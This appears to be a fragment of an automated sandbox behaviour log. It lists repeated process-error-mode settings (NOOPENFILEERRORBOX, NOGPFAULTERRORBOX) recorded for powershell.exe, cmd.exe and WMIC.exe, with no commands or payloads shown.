Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
